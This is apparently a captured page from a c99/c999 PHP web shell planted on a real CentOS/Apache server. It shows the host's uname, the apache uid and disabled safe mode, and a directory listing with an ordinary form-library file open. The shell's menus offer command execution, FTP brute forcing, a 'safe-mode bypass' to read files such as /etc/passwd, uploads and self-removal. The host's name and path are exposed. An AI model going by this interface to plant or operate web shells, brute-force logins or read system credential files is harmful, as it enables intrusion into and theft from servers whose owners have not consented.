!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/PFBC/Element/   drwxr-xr-x
Free 52.39 GB of 127.8 GB (40.99%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Select.php (919 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace PFBCElement
;

class 
Select extends PFBCOptionElement {
    protected 
$_attributes = array();

    public function 
render() { 
        if(isset(
$this->_attributes["value"])) {
            if(!
is_array($this->_attributes["value"]))
                
$this->_attributes["value"] = array($this->_attributes["value"]);
        }
        else
            
$this->_attributes["value"] = array();

        if(!empty(
$this->_attributes["multiple"]) && substr($this->_attributes["name"], -2) != "[]")
            
$this->_attributes["name"] .= "[]";

        echo 
'<select'$this->getAttributes(array("value""selected")), '>';
        
$selected false;
        foreach(
$this->options as $value => $text) {
            
$value $this->getOptionValue($value);
            echo 
'<option value="'$this->filter($value), '"';
            if(!
$selected && in_array($value$this->_attributes["value"])) {
                echo 
' selected="selected"';
                
$selected true;
            }    
            echo 
'>'$text'</option>';
        }    
        echo 
'</select>';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0147 ]--